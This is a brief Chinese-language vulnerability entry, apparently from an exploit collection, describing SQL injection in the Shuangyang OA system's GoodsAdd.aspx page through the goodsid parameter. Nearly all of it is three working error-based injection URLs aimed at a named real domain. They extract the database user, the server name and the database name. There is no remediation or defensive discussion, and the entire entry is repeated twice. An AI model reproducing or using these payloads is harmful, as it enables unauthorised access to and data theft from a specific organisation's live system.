# 双杨OA系统/DSOA_TY/goods/GoodsAdd.aspx SQL注入漏洞 ## 注入参数 goodsid ``` http://xinhuachongming.com.cn/DSOA_TY/goods/GoodsAdd.aspx?goodsid=1%20and%201=user&flag=2 ```  ``` http://xinhuachongming.com.cn/DSOA_TY/goods/GoodsAdd.aspx?goodsid=1%20and%201=@@SERVERNAME&flag=2 ```  ``` http://xinhuachongming.com.cn/DSOA_TY/goods/GoodsAdd.aspx?goodsid=1%20and%201=db_name(0)&flag=2 ``` 
# 双杨OA系统/DSOA_TY/goods/GoodsAdd.aspx SQL注入漏洞 ## 注入参数 goodsid ``` http://xinhuachongming.com.cn/DSOA_TY/goods/GoodsAdd.aspx?goodsid=1%20and%201=user&flag=2 ```  ``` http://xinhuachongming.com.cn/DSOA_TY/goods/GoodsAdd.aspx?goodsid=1%20and%201=@@SERVERNAME&flag=2 ```  ``` http://xinhuachongming.com.cn/DSOA_TY/goods/GoodsAdd.aspx?goodsid=1%20and%201=db_name(0)&flag=2 ``` 